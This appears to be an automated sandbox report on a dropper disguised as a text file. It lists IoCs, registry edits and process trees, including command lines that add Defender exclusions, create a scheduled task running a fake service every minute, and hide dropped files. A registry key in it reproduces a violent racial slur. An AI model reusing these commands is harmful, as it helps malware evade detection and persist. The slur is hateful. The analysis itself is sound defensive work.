\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 6840 timeout.exe 8016 timeout.exe 1600 timeout.exe 4496 timeout.exe -
Enumerates system info in registry 2 TTPs 21 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Process not Found -
Kills process with taskkill 38 IoCs
pid Process 5116 taskkill.exe 2184 taskkill.exe 3724 taskkill.exe 2444 taskkill.exe 5932 taskkill.exe 4576 taskkill.exe 5084 taskkill.exe 5188 taskkill.exe 5952 taskkill.exe 3908 taskkill.exe 6020 taskkill.exe 2144 taskkill.exe 1236 taskkill.exe 5800 taskkill.exe 5776 taskkill.exe 2560 taskkill.exe 1728 taskkill.exe 3644 taskkill.exe 4708 taskkill.exe 2836 taskkill.exe 3096 taskkill.exe 5408 taskkill.exe 5060 taskkill.exe 300 taskkill.exe 3652 taskkill.exe 2004 taskkill.exe 404 taskkill.exe 1504 taskkill.exe 4644 taskkill.exe 3488 taskkill.exe 5548 taskkill.exe 5344 taskkill.exe 700 taskkill.exe 2392 taskkill.exe 6004 taskkill.exe 6088 taskkill.exe 3908 taskkill.exe 5204 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-20\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-20\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\Software reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\S-1-5-20 reg.exe Key created \REGISTRY\USER\S-1-5-20 reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-20 reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\Software reg.exe -
Modifies registry class 26 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers reg.exe Key created \Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3920535620-1286624088-2946613906-1000\{C26CCE22-0619-4399-BCED-FEDD06CA68D2} Process not Found -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2476 schtasks.exe 5220 schtasks.exe 2336 schtasks.exe 7424 schtasks.exe 808 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 60 IoCs
pid Process 2392 powershell.exe 2400 powershell.exe 2392 powershell.exe 2400 powershell.exe 6128 powershell.exe 6128 powershell.exe 3776 powershell.exe 3776 powershell.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 5516 powershell.exe 5516 powershell.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 5484 powershell.exe 5484 powershell.exe 4632 powershell.exe 4632 powershell.exe 6076 powershell.exe 6076 powershell.exe 4608 powershell.exe 4608 powershell.exe 1612 powershell.exe 1612 powershell.exe 4392 powershell.exe 4392 powershell.exe 4936 powershell.exe 4936 powershell.exe 4928 powershell.exe 4928 powershell.exe 4360 powershell.exe 4360 powershell.exe 6032 powershell.exe 6032 powershell.exe 4560 powershell.exe 4560 powershell.exe 4176 powershell.exe 4176 powershell.exe 4176 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 1232 msedge.exe 2288 cmd.exe 4792 cmd.exe 10160 Process not Found 8700 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe 1232 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5888 Rasauq SoftWorks.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeDebugPrivilege 5204 taskkill.exe Token: SeDebugPrivilege 6128 powershell.exe Token: SeDebugPrivilege 3776 powershell.exe Token: SeBackupPrivilege 5176 vssvc.exe Token: SeRestorePrivilege 5176 vssvc.exe Token: SeAuditPrivilege 5176 vssvc.exe Token: SeDebugPrivilege 948 sRasauq SoftWorks.exe Token: SeDebugPrivilege 3488 taskkill.exe Token: SeDebugPrivilege 5516 powershell.exe Token: SeDebugPrivilege 5484 powershell.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 5188 taskkill.exe Token: SeDebugPrivilege 6076 powershell.exe Token: SeDebugPrivilege 5408 taskkill.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeDebugPrivilege 5888 Rasauq SoftWorks.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeDebugPrivilege 5952 taskkill.exe Token: SeDebugPrivilege 404 taskkill.exe Token: SeDebugPrivilege 5548 taskkill.exe Token: SeDebugPrivilege 5800 taskkill.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 1504 taskkill.exe Token: SeDebugPrivilege 3908 taskkill.exe Token: SeDebugPrivilege 1728 taskkill.exe Token: SeDebugPrivilege 3644 taskkill.exe Token: SeDebugPrivilege 5344 taskkill.exe Token: SeDebugPrivilege 700 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 5116 taskkill.exe Token: SeDebugPrivilege 2184 taskkill.exe Token: SeDebugPrivilege 3724 taskkill.exe Token: SeDebugPrivilege 5060 taskkill.exe Token: SeDebugPrivilege 5776 taskkill.exe Token: SeDebugPrivilege 6020 taskkill.exe Token: SeDebugPrivilege 4644 taskkill.exe Token: SeDebugPrivilege 2836 taskkill.exe Token: SeDebugPrivilege 2144 taskkill.exe Token: SeDebugPrivilege 1236 taskkill.exe Token: SeDebugPrivilege 300 taskkill.exe Token: SeDebugPrivilege 3652 taskkill.exe Token: SeDebugPrivilege 2444 taskkill.exe Token: SeDebugPrivilege 4708 taskkill.exe Token: SeDebugPrivilege 5932 taskkill.exe Token: SeDebugPrivilege 6004 taskkill.exe Token: SeDebugPrivilege 4576 taskkill.exe Token: SeDebugPrivilege 2560 taskkill.exe Token: SeDebugPrivilege 2004 taskkill.exe Token: SeTakeOwnershipPrivilege 3804 takeown.exe Token: SeDebugPrivilege 296 Windows Host Service.scr Token: SeShutdownPrivilege 2400 powercfg.exe Token: SeCreatePagefilePrivilege 2400 powercfg.exe Token: SeShutdownPrivilege 5000 powercfg.exe Token: SeCreatePagefilePrivilege 5000 powercfg.exe Token: SeShutdownPrivilege 2776 powercfg.exe Token: SeCreatePagefilePrivilege 2776 powercfg.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2400 powershell.exe 2392 powershell.exe 1232 msedge.exe 1232 msedge.exe 10160 Process not Found 10160 Process not Found 8700 Process not Found 8700 Process not Found 2400 Process not Found 2400 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 6312 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 10188 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found 8220 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2376 wrote to memory of 5888 2376 READ ME BEFOR OPEN.txt.exe 78 PID 2376 wrote to memory of 5888 2376 READ ME BEFOR OPEN.txt.exe 78 PID 2376 wrote to memory of 948 2376 READ ME BEFOR OPEN.txt.exe 79 PID 2376 wrote to memory of 948 2376 READ ME BEFOR OPEN.txt.exe 79 PID 2376 wrote to memory of 3584 2376 READ ME BEFOR OPEN.txt.exe 80 PID 2376 wrote to memory of 3584 2376 READ ME BEFOR OPEN.txt.exe 80 PID 3584 wrote to memory of 2432 3584 cmd.exe 82 PID 3584 wrote to memory of 2432 3584 cmd.exe 82 PID 3584 wrote to memory of 4168 3584 cmd.exe 83 PID 3584 wrote to memory of 4168 3584 cmd.exe 83 PID 3584 wrote to memory of 4792 3584 cmd.exe 84 PID 3584 wrote to memory of 4792 3584 cmd.exe 84 PID 3584 wrote to memory of 2288 3584 cmd.exe 85 PID 3584 wrote to memory of 2288 3584 cmd.exe 85 PID 2288 wrote to memory of 3424 2288 cmd.exe 88 PID 2288 wrote to memory of 3424 2288 cmd.exe 88 PID 4792 wrote to memory of 4332 4792 cmd.exe 89 PID 4792 wrote to memory of 4332 4792 cmd.exe 89 PID 2288 wrote to memory of 2392 2288 cmd.exe 90 PID 2288 wrote to memory of 2392 2288 cmd.exe 90 PID 4792 wrote to memory of 2400 4792 cmd.exe 91 PID 4792 wrote to memory of 2400 4792 cmd.exe 91 PID 2288 wrote to memory of 1960 2288 cmd.exe 92 PID 2288 wrote to memory of 1960 2288 cmd.exe 92 PID 4792 wrote to memory of 5064 4792 cmd.exe 93 PID 4792 wrote to memory of 5064 4792 cmd.exe 93 PID 2288 wrote to memory of 5504 2288 cmd.exe 94 PID 2288 wrote to memory of 5504 2288 cmd.exe 94 PID 2288 wrote to memory of 4680 2288 cmd.exe 95 PID 2288 wrote to memory of 4680 2288 cmd.exe 95 PID 2288 wrote to memory of 5672 2288 cmd.exe 96 PID 2288 wrote to memory of 5672 2288 cmd.exe 96 PID 2288 wrote to memory of 4416 2288 cmd.exe 97 PID 2288 wrote to memory of 4416 2288 cmd.exe 97 PID 4792 wrote to memory of 3108 4792 cmd.exe 98 PID 4792 wrote to memory of 3108 4792 cmd.exe 98 PID 2288 wrote to memory of 4424 2288 cmd.exe 99 PID 2288 wrote to memory of 4424 2288 cmd.exe 99 PID 4792 wrote to memory of 5084 4792 cmd.exe 100 PID 4792 wrote to memory of 5084 4792 cmd.exe 100 PID 2288 wrote to memory of 6084 2288 cmd.exe 101 PID 2288 wrote to memory of 6084 2288 cmd.exe 101 PID 2288 wrote to memory of 3448 2288 cmd.exe 102 PID 2288 wrote to memory of 3448 2288 cmd.exe 102 PID 4792 wrote to memory of 5868 4792 cmd.exe 103 PID 4792 wrote to memory of 5868 4792 cmd.exe 103 PID 2288 wrote to memory of 3552 2288 cmd.exe 104 PID 2288 wrote to memory of 3552 2288 cmd.exe 104 PID 4792 wrote to memory of 1084 4792 cmd.exe 105 PID 4792 wrote to memory of 1084 4792 cmd.exe 105 PID 2288 wrote to memory of 5448 2288 cmd.exe 106 PID 2288 wrote to memory of 5448 2288 cmd.exe 106 PID 4792 wrote to memory of 6096 4792 cmd.exe 107 PID 4792 wrote to memory of 6096 4792 cmd.exe 107 PID 2288 wrote to memory of 2876 2288 cmd.exe 108 PID 2288 wrote to memory of 2876 2288 cmd.exe 108 PID 4792 wrote to memory of 2692 4792 cmd.exe 109 PID 4792 wrote to memory of 2692 4792 cmd.exe 109 PID 2288 wrote to memory of 2936 2288 cmd.exe 110 PID 2288 wrote to memory of 2936 2288 cmd.exe 110 PID 4792 wrote to memory of 2184 4792 cmd.exe 111 PID 4792 wrote to memory of 2184 4792 cmd.exe 111 PID 4792 wrote to memory of 3656 4792 cmd.exe 113 PID 4792 wrote to memory of 3656 4792 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3540 attrib.exe 4804 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2336
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows Host Service"3⤵PID:7844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp26C.tmp.bat""3⤵PID:7900
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:8016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3540
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEFFD.tmp.bat""3⤵PID:6620
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:6840
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"4⤵
- Executes dropped EXE
PID:6696 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵PID:7476
-
-
